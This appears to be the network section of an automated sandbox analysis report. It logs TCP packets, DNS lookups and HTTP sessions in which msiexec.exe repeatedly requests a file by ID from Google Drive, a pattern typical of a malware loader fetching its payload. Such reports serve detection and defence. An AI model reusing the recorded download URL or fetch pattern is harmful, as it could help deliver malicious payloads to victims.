                                                                Jan 11, 2025 04:27:52.905059099 CET50027443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:52.905078888 CET44350027142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:27:53.554609060 CET44350027142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:27:53.554683924 CET50027443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:53.555179119 CET50027443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:53.555183887 CET44350027142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:27:53.555331945 CET50027443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:53.555335045 CET44350027142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:27:53.940172911 CET44350027142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:27:53.940258026 CET50027443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:53.940269947 CET44350027142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:27:53.940396070 CET50027443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:53.940515995 CET50027443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:53.940538883 CET44350027142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:27:53.940547943 CET50027443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:53.940592051 CET50027443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:53.958029032 CET50028443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:53.958085060 CET44350028142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:53.958156109 CET50028443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:53.958376884 CET50028443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:53.958398104 CET44350028142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:54.601689100 CET44350028142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:54.604943037 CET50028443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:54.605350971 CET50028443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:54.605359077 CET44350028142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:54.605556965 CET50028443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:54.605561972 CET44350028142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:55.023622036 CET44350028142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:55.023718119 CET44350028142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:55.023746014 CET50028443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:55.023777008 CET44350028142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:55.023794889 CET50028443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:55.023807049 CET44350028142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:55.023869038 CET50028443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:55.023869038 CET50028443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:55.024586916 CET50028443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:55.024601936 CET44350028142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:55.141345978 CET50029443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:55.141410112 CET44350029142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:27:55.141745090 CET50029443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:55.141746044 CET50029443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:55.141782999 CET44350029142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:27:55.779570103 CET44350029142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:27:55.779697895 CET50029443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:55.780194998 CET50029443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:55.780201912 CET44350029142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:27:55.780379057 CET50029443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:55.780384064 CET44350029142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:27:56.261013985 CET44350029142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:27:56.261161089 CET50029443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:56.261188984 CET44350029142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:27:56.261240005 CET50029443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:56.261312962 CET50029443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:56.261354923 CET44350029142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:27:56.261411905 CET50029443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:56.267503977 CET50030443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:56.267553091 CET44350030142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:56.267616987 CET50030443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:56.267848969 CET50030443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:56.267860889 CET44350030142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:56.924200058 CET44350030142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:56.924856901 CET50030443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:56.925052881 CET50030443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:56.925052881 CET50030443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:56.925066948 CET44350030142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:56.925082922 CET44350030142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:57.351728916 CET44350030142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:57.351792097 CET44350030142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:57.351826906 CET50030443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:57.351857901 CET44350030142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:57.351872921 CET50030443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:57.351898909 CET50030443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:57.351903915 CET44350030142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:57.351926088 CET44350030142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:57.351938009 CET50030443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:57.351967096 CET50030443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:57.352566004 CET50030443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:57.352583885 CET44350030142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:57.468869925 CET50031443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:57.468926907 CET44350031142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:27:57.469029903 CET50031443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:57.469324112 CET50031443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:57.469336033 CET44350031142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:27:58.117891073 CET44350031142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:27:58.118035078 CET50031443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:58.118978024 CET44350031142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:27:58.119055986 CET50031443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:58.120719910 CET50031443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:58.120729923 CET44350031142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:27:58.121117115 CET44350031142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:27:58.121181011 CET50031443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:58.121545076 CET50031443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:58.163341999 CET44350031142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:27:58.499541044 CET44350031142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:27:58.499644041 CET44350031142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:27:58.499684095 CET50031443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:58.499712944 CET50031443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:58.499816895 CET50031443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:58.499841928 CET44350031142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:27:58.504273891 CET50032443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:58.504324913 CET44350032142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:58.504403114 CET50032443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:58.504602909 CET50032443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:58.504616022 CET44350032142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:59.152775049 CET44350032142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:59.153013945 CET50032443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:59.153539896 CET50032443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:59.153539896 CET50032443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:59.153546095 CET44350032142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:59.153553009 CET44350032142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:59.587368011 CET44350032142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:59.587455034 CET44350032142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:59.587510109 CET50032443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:59.587527037 CET44350032142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:59.587542057 CET44350032142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:59.587555885 CET50032443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:59.587570906 CET50032443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:59.587603092 CET50032443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:59.588191986 CET50032443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:27:59.588207960 CET44350032142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:27:59.719054937 CET50033443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:59.719108105 CET44350033142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:27:59.719192982 CET50033443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:59.719471931 CET50033443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:27:59.719484091 CET44350033142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:28:00.358460903 CET44350033142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:28:00.358639956 CET50033443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:28:00.358987093 CET50033443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:28:00.358994007 CET44350033142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:28:00.359148979 CET50033443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:28:00.359153986 CET44350033142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:28:00.750662088 CET44350033142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:28:00.750747919 CET44350033142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:28:00.750791073 CET50033443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:28:00.750819921 CET50033443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:28:00.750963926 CET50033443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:28:00.750984907 CET44350033142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:28:00.756278038 CET50034443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:28:00.756320953 CET44350034142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:28:00.756396055 CET50034443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:28:00.756609917 CET50034443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:28:00.756622076 CET44350034142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:28:01.405898094 CET44350034142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:28:01.406075001 CET50034443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:28:01.406536102 CET50034443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:28:01.406553984 CET44350034142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:28:01.406796932 CET50034443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:28:01.406805992 CET44350034142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:28:01.838485003 CET44350034142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:28:01.838552952 CET44350034142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:28:01.838619947 CET50034443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:28:01.838630915 CET44350034142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:28:01.838643074 CET44350034142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:28:01.838660955 CET50034443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:28:01.838701010 CET50034443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:28:01.838701010 CET50034443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:28:01.839859009 CET50034443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:28:01.839874983 CET44350034142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:28:02.298644066 CET50035443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:28:02.298700094 CET44350035142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:28:02.298861027 CET50035443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:28:02.299125910 CET50035443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:28:02.299139023 CET44350035142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:28:02.932806969 CET44350035142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:28:02.932868958 CET50035443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:28:02.933284044 CET50035443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:28:02.933291912 CET44350035142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:28:02.933461905 CET50035443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:28:02.933466911 CET44350035142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:28:03.416474104 CET44350035142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:28:03.416940928 CET50035443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:28:03.416956902 CET44350035142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:28:03.417880058 CET44350035142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:28:03.417932987 CET50035443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:28:03.417932987 CET50035443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:28:03.422127008 CET50035443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:28:03.422149897 CET44350035142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:28:03.431157112 CET50036443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:28:03.431210041 CET44350036142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:28:03.431452036 CET50036443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:28:03.431684971 CET50036443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:28:03.431696892 CET44350036142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:28:04.061238050 CET44350036142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:28:04.064963102 CET50036443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:28:04.069169998 CET50036443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:28:04.069196939 CET44350036142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:28:04.069401026 CET50036443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:28:04.069412947 CET44350036142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:28:04.486546040 CET44350036142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:28:04.486711025 CET44350036142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:28:04.486810923 CET50036443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:28:04.486841917 CET44350036142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:28:04.486855984 CET44350036142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:28:04.486897945 CET50036443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:28:04.487755060 CET50036443192.168.2.11142.250.185.161
                                                                Jan 11, 2025 04:28:04.487782955 CET44350036142.250.185.161192.168.2.11
                                                                Jan 11, 2025 04:28:04.609819889 CET50037443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:28:04.609879017 CET44350037142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:28:04.609980106 CET50037443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:28:04.610234022 CET50037443192.168.2.11142.250.184.238
                                                                Jan 11, 2025 04:28:04.610254049 CET44350037142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:28:05.259604931 CET44350037142.250.184.238192.168.2.11
                                                                Jan 11, 2025 04:28:05.259687901 CET50037443192.168.2.11142.250.184.238
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 11, 2025 04:27:00.063014030 CET5676153192.168.2.111.1.1.1
                                                                Jan 11, 2025 04:27:00.069556952 CET53567611.1.1.1192.168.2.11
                                                                Jan 11, 2025 04:27:01.165666103 CET6184353192.168.2.111.1.1.1
                                                                Jan 11, 2025 04:27:01.172817945 CET53618431.1.1.1192.168.2.11
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Jan 11, 2025 04:27:00.063014030 CET192.168.2.111.1.1.10xa854Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                Jan 11, 2025 04:27:01.165666103 CET192.168.2.111.1.1.10xd64cStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Jan 11, 2025 04:25:57.426825047 CET1.1.1.1192.168.2.110xd684No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                Jan 11, 2025 04:25:57.426825047 CET1.1.1.1192.168.2.110xd684No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                Jan 11, 2025 04:27:00.069556952 CET1.1.1.1192.168.2.110xa854No error (0)drive.google.com142.250.184.238A (IP address)IN (0x0001)false
                                                                Jan 11, 2025 04:27:01.172817945 CET1.1.1.1192.168.2.110xd64cNo error (0)drive.usercontent.google.com142.250.185.161A (IP address)IN (0x0001)false
                                                                • drive.google.com
                                                                • drive.usercontent.google.com
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.1149980142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:00 UTC216OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                2025-01-11 03:27:01 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:00 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-5xV3x-VbxdS4Hu167sLJFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.1149981142.250.185.1614437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:01 UTC258OUTGET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                2025-01-11 03:27:02 UTC2225INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgT7FQZEg2Oh5_IaK8VanZKJaCivWDm8bRNIGOvZxlbqSN4CKtrZi08Wp4bh_VnEhDWYIPt5P0s
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:02 GMT
                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-r2j7nHv8rBykO1328rRtEA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Set-Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g; expires=Sun, 13-Jul-2025 03:27:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-11 03:27:02 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 57 69 53 72 62 31 33 64 48 2d 76 6e 44 38 48 75 74 49 5a 38 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OWiSrb13dH-vnD8HutIZ8A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.1149982142.250.184.2384437536C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-11 03:27:03 UTC417OUTGET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
                                                                2025-01-11 03:27:03 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Sat, 11 Jan 2025 03:27:03 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: script-src 'nonce-FWU0NZGBokI1x_ZZ_ZC9DA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
